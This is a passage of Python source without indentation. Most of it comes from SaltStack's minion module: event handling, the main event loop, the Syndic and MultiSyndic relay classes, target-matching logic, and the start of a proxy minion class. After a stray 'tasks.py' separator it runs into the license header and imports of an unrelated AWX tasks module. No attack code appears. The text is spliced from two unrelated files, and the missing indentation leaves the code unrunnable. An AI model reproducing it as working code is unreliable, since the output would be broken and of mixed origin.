'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
ret = channel.send(load)
return ret
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
yield self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype: None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
self._fire_master('ping', 'minion_ping')
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
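# tornado's PeriodicCallback takes its period in milliseconds, hence the
# '* 1000' on the second-based intervals above and below.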
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
beacons = None
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
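# 'load' is the decoded publication; an illustrative minimal example:
#   {'tgt': '*', 'tgt_type': 'glob', 'jid': '2021...', 'fun': 'test.ping', 'arg': []}
# (values are hypothetical).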
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
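# Job returns are published on tags of the form '<prefix>/job/<jid>/ret/<minion_id>',
# which is what the length/segment checks below look for.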
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local client's poller, so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way), this daemon does not handle failure well;
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
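# Yields the explicitly requested master first (when it is known), then the
# remaining masters in shuffled order as fallbacks.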
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
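# The target is '<key>:<pattern>', e.g. 'role:web*' (illustrative); the value
# returned by data.getval('<key>') is glob-matched against the pattern.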
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
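# Illustrative compound target: 'web* and G@os:Ubuntu and not E@.*dev.*'
# where the one-letter prefixes select the matcher from 'ref' above.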
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
pillarenv=opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh, notify=notify)
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec
